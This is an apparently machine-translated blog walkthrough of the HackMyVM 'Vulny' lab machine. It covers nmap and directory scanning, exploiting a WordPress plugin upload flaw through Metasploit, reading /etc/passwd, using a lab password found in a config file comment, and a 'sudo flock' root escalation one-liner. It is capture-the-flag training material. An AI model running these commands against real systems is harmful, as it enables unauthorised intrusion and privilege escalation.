当前位置:网站首页>Hackmyvm target series (4) -vulny
Hackmyvm target series (4) -vulny
2022-07-06 13:57:00 【The moon should know my meaning】
One 、 information gathering
The old , Let's start with a wave of network segment scanning , Discover the host
nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox
Use nmap Scan port , Two ports were found , One 80 port , One 33060( I don't know what it is , No matter it first )
nmap -sC -sV 192.168.200.153 -p-
Visit the home page , However, no useful information was found .
The old , Let's start with a wave of directory scanning , See if you can find any useful information .
Use gobuster Scan the directory .
gobuster dir -u http://192.168.200.153 -w directory-list-2.3-medium.txt -t 30 -x php,html,txt,7z,zip,bak,gz
Found several directories and files , After visiting , Only secret The directory is useful .
Find keywords wordpress, Is this website cms yes wordpress?
Reuse dirsearch Scan this record and try
dirsearch -u "http://192.168.200.153/secret/" -e php,html,txt,zip,bak,gz,7z -x 404,500-599 -t 50
Sure enough wordpress, There are many catalogues .
Visit the following directories one by one to see if there are any gains
Found a compressed file , Download it and see . However, after opening it, I found that I was still too young , I don't understand .
So Baidu took a look , This is a wordpress A plug-in for , There is also an arbitrary file upload vulnerability .
On exploitdb Search the Internet , Found a utilization script . But I always report syntax errors in this script , We won't change , Then we can only find another way .
Two 、 Exploit
Use msf, stay msf The exploitation method of this vulnerability is found above .
Configuration module parameters , Use success , To obtain a web jurisdiction . Use python Get an interactive shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
Check the user , Find out besides root One more adrian user
cat /etc/passwd
Pay attention to this sentence , Mentioned the configuration file and the ability to read accounts and passwords .
Then try reading wordpress Try the configuration file of !
<!-- A picture is missing here , Reading the configuration file, you can see a line of comments -->
Why ! A line of comments is found here , Is this the password of the user above ?
adrian:idrinksomewater
perfect , Successfully switched users !
Get the first flag
3、 ... and 、 Elevated privileges
See if there is any order to raise power !
flock The command can be executed as any user without permission password .
Enter the following command to raise the right
sudo flock -u / /bin/bash
perfect , Successfully promoted the permission to root
Get the second flag
边栏推荐
- HackMyvm靶机系列(3)-visions
- Strengthen basic learning records
- Experiment five categories and objects
- HackMyvm靶机系列(2)-warrior
- Relationship between hashcode() and equals()
- Strengthen basic learning records
- 3. Input and output functions (printf, scanf, getchar and putchar)
- 深度强化文献阅读系列(一):Courier routing and assignment for food delivery service using reinforcement learning
- Experiment 6 inheritance and polymorphism
- 7-3 构造散列表(PTA程序设计)
猜你喜欢
Strengthen basic learning records
A comprehensive summary of MySQL transactions and implementation principles, and no longer have to worry about interviews
Safe driving skills on ice and snow roads
Matlab opens M file garbled solution
强化学习基础记录
Mixlab unbounded community white paper officially released
Reinforcement learning series (I): basic principles and concepts
仿牛客技术博客项目常见问题及解答(二)
MySQL事务及实现原理全面总结,再也不用担心面试
. Net6: develop modern 3D industrial software based on WPF (2)
随机推荐
[insert, modify and delete data in the headsong educator data table]
Force deduction 152 question multiplier maximum subarray
Nuxtjs quick start (nuxt2)
HackMyvm靶机系列(2)-warrior
【头歌educoder数据表中数据的插入、修改和删除】
Using qcommonstyle to draw custom form parts
Have you encountered ABA problems? Let's talk about the following in detail, how to avoid ABA problems
实验六 继承和多态
7-7 7003 组合锁(PTA程序设计)
7-15 h0161. Find the greatest common divisor and the least common multiple (PTA program design)
[面試時]——我如何講清楚TCP實現可靠傳輸的機制
It's never too late to start. The tramp transformation programmer has an annual salary of more than 700000 yuan
【MySQL数据库的学习】
Callback function ----------- callback
强化学习基础记录
[MySQL database learning]
7-14 错误票据(PTA程序设计)
Record a penetration of the cat shed from outside to inside. Library operation extraction flag
7-9 make house number 3.0 (PTA program design)
7-9 制作门牌号3.0(PTA程序设计)